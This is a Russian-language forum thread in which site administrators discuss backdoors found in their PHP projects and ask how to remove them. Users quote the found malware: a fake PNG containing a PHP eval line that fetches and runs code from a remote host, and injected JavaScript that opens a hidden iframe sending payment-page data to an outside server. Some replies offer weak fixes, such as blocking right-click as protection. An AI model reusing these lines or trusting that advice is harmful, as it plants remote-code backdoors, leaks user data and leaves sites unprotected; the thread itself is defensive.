rezerv
Участник
- Сообщения
- 211
- Реакции
- 10
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
У меня в JS встречается eval ,как в середине слова так и отдельно.
так же в PNG файле,и в одном ПХП файле,че делать?и в ПНГ и в ПХП особого кода нет,только eval и еще какая то дребедень.Кому не трудно проверьте и подскажите что с ним делать.
D:\OpenServer\domains\xxx\js\editor\jscripts\tiny_mce\themes\simple\skins\o2k7\img\ (и вот эти два файла сидят вот здесь)
P.S При загрузке button.png форум выдал ошибку ,что загружаемый png Файл не является изображением,после чего сменил расширение на .txt где увидел следующее :
<?PHP
eval(file_get_contents("http://zaloopa.net/licence.txt"));
?>
P.S.S перейдя по ссылке выдает следующее :
echo 255;
die();
так же в PNG файле,и в одном ПХП файле,че делать?и в ПНГ и в ПХП особого кода нет,только eval и еще какая то дребедень.Кому не трудно проверьте и подскажите что с ним делать.
D:\OpenServer\domains\xxx\js\editor\jscripts\tiny_mce\themes\simple\skins\o2k7\img\ (и вот эти два файла сидят вот здесь)
P.S При загрузке button.png форум выдал ошибку ,что загружаемый png Файл не является изображением,после чего сменил расширение на .txt где увидел следующее :
<?PHP
eval(file_get_contents("http://zaloopa.net/licence.txt"));
?>
P.S.S перейдя по ссылке выдает следующее :
echo 255;
die();
Вложения
-
93 байт Просмотры: 48
Последнее редактирование:
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
nocenzru
Участник
- Сообщения
- 5
- Реакции
- 0
Пока вызов кода просто печатает "255" и ничего более, но думаю в определенный момент на том сервере содержимое licence.txt станет иным и тогда.....Algolem написал(а):У меня в JS встречается eval ,как в середине слова так и отдельно.
так же в PNG файле,и в одном ПХП файле,че делать?и в ПНГ и в ПХП особого кода нет,только eval и еще какая то дребедень.Кому не трудно проверьте и подскажите что с ним делать.
D:\OpenServer\domains\xxx\js\editor\jscripts\tiny_mce\themes\simple\skins\o2k7\img\ (и вот эти два файла сидят вот здесь)
P.S При загрузке button.png форум выдал ошибку ,что загружаемый png Файл не является изображением,после чего сменил расширение на .txt где увидел следующее :
<?PHP
eval(file_get_contents("http://zaloopa.net/licence.txt"));
?>
P.S.S перейдя по ссылке выдает следующее :
echo 255;
die();
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
И что с ним делать,если тупо удалю,помешает работе сайта?и если удалять какие именно файлы удалить?nocenzru написал(а):Пока вызов кода просто печатает "255" и ничего более, но думаю в определенный момент на том сервере содержимое licence.txt станет иным и тогда.....
wh1skas написал(а):...
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.
nocenzru
Участник
- Сообщения
- 5
- Реакции
- 0
пожалуй самый безболезненый вариант - создать у себя на сервере похожие файлы (licence.txt и [URL='https://servahoc.ru/redirect/?url=http://zaloopa.net/licence.txt']licence.php например)[/URL] и заменить все ссылки с чужого на свой файлAlgolem написал(а):И что с ним делать,если тупо удалю,помешает работе сайта?и если удалять какие именно файлы удалить?
другой вариант посложнее. необходимо удалять все строки где они встречаются. Но одновременно проверять работоспособность скрипта в целом. Хотя по моему опыту, удаление подобной заразы не ухудшает роботоспособность скрипта
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
Добрый день форумчане!Значит удалил все содержимое в файле button_pt.php , так же удалил псевдо-png файл.Пока изменений в скрипте не вижу.
и еще проверил скрипт на "http://find-xss.net/scanner/",и выявленные ошибки вроде закрыл,автоматом.и так пару раз,теперь при проверке выдает следующее :
/ххх/inc/_menu_top.php
2:Конструкция нуждается в ручной проверке
3:Конструкция нуждается в ручной проверке
4:Конструкция нуждается в ручной проверке
а это весь код в выше указанном файле,ну и что тут неправильного?
и еще проверил скрипт на "http://find-xss.net/scanner/",и выявленные ошибки вроде закрыл,автоматом.и так пару раз,теперь при проверке выдает следующее :
/ххх/inc/_menu_top.php
2:Конструкция нуждается в ручной проверке
3:Конструкция нуждается в ручной проверке
4:Конструкция нуждается в ручной проверке
а это весь код в выше указанном файле,ну и что тут неправильного?
PHP:
<ul class="hd-menu">
<li><a href="/" <?=(!isset($_GET["menu"]) OR strtolower($_GET["menu"]) == "index") ? 'class="current"' : False; ?>>Главная</a></li>
<li><a href="/news" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "news") ? 'class="current"' : False; ?>>Новости</a></li>
<li><a href="/rules" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "rules") ? 'class="current"' : False; ?>>Правила</a></li>
<li><a href="/about" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "about") ? 'class="current"' : False; ?>>О проекте</a></li>
<li><a href="/contacts" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "contacts") ? 'class="current"' : False; ?>>Контакты</a></li>
</ul>
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
А это очень трудно?я в ПХП не разбираюсьwh1skas написал(а):Он тебя просит подкорректировать $_GET["menu"] и подобные GET-запросы.
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
В этом ты прав,но я на практике более быстро осваиваю,чем сидеть и книжки читать.Поэтому здесь спрашиваю у гуру,потомучто более подробных описаний да еще и простым языком,нигде не найдешь!wh1skas написал(а):а пора уже давно научиться, раз собираешься администрировать инвест-проекты. Тем более...
вот тут https://servahoc.ru/threads/filtracija-i-proverka-dannyx-php-chastye-oshibki.997/ очень хорошо написано. Если с первого раза не поймешь, перечитай. Пропускать не советую и настоятельно рекомендую читать.Algolem написал(а):В этом ты прав,но я на практике более быстро осваиваю,чем сидеть и книжки читать.Поэтому здесь спрашиваю у гуру,потомучто более подробных описаний да еще и простым языком,нигде не найдешь!
gplm555
Местный
- Сообщения
- 39
- Реакции
- 1
И что делать? Как сайт защитить от подмены кошелька? Помочь можешь? Заплачу!Ferz написал(а):Сейчас решил посмотреть "код элемента" и вдруг вот что увидел...
вот скопировал:
В файле payments нету ничего связанного с payloads..PHP:function send_data(ifr_url){ var ifr0 = document.createElement('iframe'); ifr0.src = ifr_url; ifr0.style.width = '1px'; ifr0.style.height = '1px'; var div_x0 = document.getElementById('mast'); div_x0.appendChild(ifr0); } send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php');
Это безопасно?
Также прилагаю скрин.
И да, кстати, все тутблокируют ПКМ, но "показать код элемента" можно вызвать и через комбинацию клавиш CTRL+SHIFT+I (Chrome)
a010885
Местный
- Сообщения
- 46
- Реакции
- 6
У меня вообще этой папки нет в фруктовой ферме, удаляйте её смело.Vic212 написал(а):я как раз ищу в сери как поставить правильно защиту htaccess на js. как по мне, то папка tiny_mce вообще не может удалиться из скрипта. они вроде нигде не конфигурирует. может я и ошибаюсь. но именно через нее идут хаки на сайт.
a010885
Местный
- Сообщения
- 46
- Реакции
- 6
Чтобы на сервер ничего не смогли залить, нужно в корне сайта иметь файл: .ftpaccess с содержимым:wh1skas написал(а):Через эту папку заливают кнопку _button.php и делают выплаты на свой кошель. Проверь, если в этой категории подобные файлы с именем button, удали их и на папку tiny_mce поставь права 444
<Limit All>
Order allow,deny
Allow from ВАШ АЙПИ
Deny from all
</Limit>
<Limit WRITE>
DenyAll
</Limit>
и тогда ниодна б**дь никогда не сможет ничего залить на сайт и изменить ни один файл. но и вы тоже не сможете, прежде чем изменить какой то файл на своём сайте или залить что то новое, вам предётся удалить .ftpaccess через СИ панель в файловом менеджере.
juranja
Местный
- Сообщения
- 99
- Реакции
- 5
можно немного по подробней в каком файле вставляем данный кодwh1skas написал(а):Сразу добавлю, видел поднималась тема насчет подмены привязанного кошелька на странице при помощи, выделении элемента и команды "Просмотр код элемента". Заменяя тем самым в редакторе привязанный кошелек к нужному. Так вот, для того, чтобы пользователь не смог это сделать, запретите использование пкм на странице(ах):
Вставляем код в самую верхнюю часть файла.PHP:<script LANGUAGE="JavaScript1.1"> document.oncontextmenu = function(){return false;}; </script>